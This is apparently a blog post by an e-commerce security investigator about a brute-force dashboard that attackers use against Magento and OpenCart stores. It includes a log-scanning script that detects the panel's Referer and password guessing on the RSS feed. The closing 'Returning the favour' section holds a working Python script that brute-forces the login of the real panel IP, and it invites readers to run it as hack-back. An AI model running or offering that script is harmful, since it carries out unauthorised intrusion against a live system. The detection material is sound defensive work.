An OpenCart/Magento hacking dashboard


This post shows how sophisticated Magento hacking operations have become nowadays, and suggests a measure to counter them.

While investigating a bruteforced Magento store, I noticed that the hacker had logged in with a curious Referer header:

"GET /rss/catalog/notifystock/ HTTP/1.1" 200 5676 "http://194.87.232.147:777/"

The site at http://194.87.232.147:777/ shows:

[Screenshot: brute force dashboard]

A “Magento report panel” asks for a Пароль (password), so we can’t get in. But the page source (JavaScript beautified here) gives some clues about its purpose:

$.post("/home/getServers", function(n) {
$.post("/home/GetCountGoodLastDay", function(n) {
$.post("/home/GetCountServerLastDay", function(n) {
$.post("/home/GetCountSuccessLastDay", function(n) {
$.post("/home/ChangeMarkState", {
$.post("/home/ChangeComment", { 
$.post("/home/getCount", { 
$.post("/home/ChangeShell", {
$.post("/home/ChangeReservedLogins", {

Apparently somebody has built a dedicated dashboard to manage bruteforce Magento hacking operations! Judging by the endpoint names, it tracks the daily tally of newly found servers and successful logins (GetCountServerLastDay, GetCountSuccessLastDay), lets the operator mark a server as “success” and annotate it (ChangeMarkState, ChangeComment), and keeps a shell and reserved logins per store (ChangeShell, ChangeReservedLogins). It is also used to log in to the backend of hacked stores, which is how its address ended up as the Referer in my logs.

I checked my forensic notes from previous cases and found that this dashboard had been used in at least one other case. Sysadmins, check your server logs for this referrer!
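A practical version of that log check, added here as an example and not code from the original post: it parses combined-format access log lines and flags both traces the post gives of this crew, the leaked panel Referer and a burst of HTTP 401s on /rss/catalog/notifystock/ (in Magento 1 that feed authenticates admin users over HTTP Basic auth, which is what makes it a password-guessing target). The panel host comes from the post; the failure threshold, the second feed path and the sample log lines are my own constructions.

```python
#!/usr/bin/env python3
"""
Added example (not code from the original post): scan combined-format
access logs for the two traces the post gives of this brute-force crew.

  1. A Referer pointing at the panel host (194.87.232.147:777 in the
     post): the operator's browser leaks it when he follows a link from
     the panel into a store he has cracked.
  2. A burst of HTTP 401s on /rss/catalog/notifystock/ from one IP,
     optionally followed by a 200.  That Magento 1 RSS feed checks admin
     credentials over HTTP Basic auth, which is why it shows up in the
     post's log line and makes a handy password-guessing target.
"""
import re
from collections import defaultdict

PANEL_HOSTS = {"194.87.232.147:777"}      # from the post; add your own findings
RSS_ADMIN_PATHS = ("/rss/catalog/notifystock", "/rss/order/new")  # Magento 1 admin-only feeds
FAIL_THRESHOLD = 5                        # assumption: tune to the store's normal traffic

# Combined log format; Referer and User-Agent are optional so that a
# truncated line like the one quoted in the post also parses.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)")?(?: "(?P<ua>[^"]*)")?'
)


def parse_line(line):
    """Return the log fields as a dict, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def referer_host(referer):
    """'http://194.87.232.147:777/' -> '194.87.232.147:777'; '-' or None -> None."""
    m = re.match(r'https?://([^/]+)', referer or "")
    return m.group(1) if m else None


def scan(lines):
    """Return panel-referer hits and per-IP brute-force tallies on the admin feeds."""
    panel_hits = []
    feed = defaultdict(lambda: {"fail": 0, "success": False})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if referer_host(rec["referer"]) in PANEL_HOSTS:
            panel_hits.append((rec["ip"], rec["path"], rec["status"]))
        if rec["path"].startswith(RSS_ADMIN_PATHS):
            tally = feed[rec["ip"]]
            if rec["status"] == "401":
                tally["fail"] += 1
            elif rec["status"] == "200":          # a 200 after many 401s = a guessed password
                tally["success"] = True
    brute = {ip: t for ip, t in feed.items() if t["fail"] >= FAIL_THRESHOLD}
    return {"panel_referers": panel_hits, "rss_bruteforce": brute}


# Constructed sample log, not real traffic: one guessing IP that gets in on
# the sixth try and then hits the feed from the panel, plus a normal visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Apr/2015:10:00:01 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
203.0.113.7 - - [09/Apr/2015:10:00:02 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
203.0.113.7 - - [09/Apr/2015:10:00:03 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
203.0.113.7 - - [09/Apr/2015:10:00:04 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
203.0.113.7 - - [09/Apr/2015:10:00:05 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
203.0.113.7 - - [09/Apr/2015:10:00:09 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 200 5676 "http://194.87.232.147:777/" "Mozilla/5.0"
198.51.100.2 - - [09/Apr/2015:10:01:00 +0000] "GET /index.php/ HTTP/1.1" 200 21044 "https://www.google.com/" "Mozilla/5.0"
198.51.100.2 - - [09/Apr/2015:10:01:02 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    result = scan(SAMPLE_LOG)
    for ip, path, status in result["panel_referers"]:
        print("panel referer: {} {} -> {}".format(ip, path, status))
    for ip, t in result["rss_bruteforce"].items():
        print("feed brute force: {} {} x 401, success={}".format(ip, t["fail"], t["success"]))
```

Two caveats. The Referer is entirely under the attacker's control and usually absent, so the first indicator only catches a careless operator; its absence proves nothing. The 401 tally works regardless of what the attacker sends, but it is keyed per IP, so a crew rotating through proxies will stay under the threshold; in that case group by path instead and look at the failure rate for the whole feed.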

Update April 11th: Super-sleuth Len Lorijn noted that an “Opencart Report Panel” is running on the same server. This shows that e-commerce hackers are platform agnostic: if there is money flowing through it, it is worth hacking.

Returning the favour

I wonder if the culprit has bruteforce protection on his own management panel. Wouldn’t it be a nice gesture if the bruteforcer got bruteforced? Now, I won’t do that, as it is not allowed in my country. But if you happen to live in a place where that is not the case (anyone from Belize?), you could use something like this (educational disclaimer, yada yada):

#!/usr/bin/env python3
"""
Brute force the admin password
of a Russian brute forcer's admin panel
"""

import requests

URL = 'http://194.87.232.147:777/Account/Login'

print("Downloading Russian wordlist...")
wordlist = requests.get('https://github.com/svetlitskiy/wordlist-russian/blob/master/russian-words.json?raw=true').json()

session = requests.Session()  # keeps any cookie the panel hands out
for word in wordlist:
    print("Trying {}".format(word))
    resp = session.post(URL, data=dict(Password=word), timeout=10)
    # On a wrong password the panel re-renders its own login form; a 200 without
    # that form means we got past it. Compare against resp.text (str), not
    # resp.content (bytes): a str-in-bytes test raises TypeError in Python 3.
    if resp.status_code == 200 and 'form action="/Account/Login"' not in resp.text:
        print("{} looks good!".format(word))
        break

In Dutch we have a very applicable saying:

een koekje van eigen deeg

which translates literally to

give someone a cookie from his own dough

or, in English idiom, a taste of his own medicine.

Hacked store? Hire me! New posts are announced on Twitter.